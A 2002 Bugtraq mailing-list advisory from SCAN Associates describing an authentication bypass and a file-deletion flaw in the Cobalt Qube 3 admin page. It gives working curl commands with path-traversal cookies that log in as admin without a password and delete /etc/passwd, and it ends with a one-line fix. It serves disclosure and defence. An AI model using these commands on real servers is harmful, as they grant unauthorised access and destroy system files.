Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Cobalt Qube 3 Administration page

From: pokley <saleh () scan-associates net>
Date: Wed, 24 Jul 2002 09:40:01 +0800


SCAN Associates Sdn Bhd Security Advisory


Product: Cobalt Qube 3 (Cobalt Linux release 6.0 (Carmel)Kernel 2.2.16C7 on
an i586)

Date: 23rd July 2002

Summary: By pass login

Author: pokleyzz <pokleyzz () scan-associates net>, sk <sk () scan-associates net>,
shaharil <shaharil () scan-associates net>


Description
===========
First of all, we would like to thank you Sun Microsystem (Malaysia) for
sponsoring a Cobalt Qube 3 server during the recent HackInTheBox Capture the
Flag Security Conference on 16-17 July 2002. Being the winner, we are proud
to receive this cool box. After playing around for awhile, we found several
problems in Cobalt Qube 3 System Management. The most serious bug may allow
remote access as Admin. We have alerted security-alert () sun com and Sun
Microsystem (Malaysia) on 19th July but unfortunately we did not receive any
feedback.

Details
=======

Problem 1: Local Privilege Escalation to Admin

Any user with ability to create file in any location of a Cobalt server will
be able to promote to Admin access of the System Management. A user may
create a file in /tmp/test and crafted a cookie to login as Admin without
password:

Create dummy session file in Cobalt server:

$ printf "admin" > /tmp/test

Login without password from anywhere:

$ curl -b sessionId=/../../../../../../tmp/test\;loginName=admin
http://192.168.0.1:444/splashAdmin.php


Problem 2: Remote User access

We also found out that if the User account is newly created, we can bypass
the authentication without a need to create dummy session file in the
server:

$curl -b sessionId=../codb/objects/4/.name\;loginName=admin
http://192.168.0.1:444/splashAdmin.php


Problem 3: Remotely delete file

It is possible to delete file from the server by specifying the path to the
file and the first 31 characters of the file. The following example will
delete the /etc/passwd file from the server:

$curl -b
sessionId=../../../../../../../../etc/passwd\;loginName=root:x:0:0:root:/root:/bin/bash http://192.168.0.1:444/splashAdmin.php 


Quick Solution
==============

/usr/sausalito/ui/libPhp/ServerScriptHelper.php
line 64: $sessionId = ereg_replace("\.\.","",$sessionId); 



* - curl can be download from http://curl.haxx.se/download.html


www.scan-associates.net
Previous By Date Next
Previous By Thread Next

Current thread: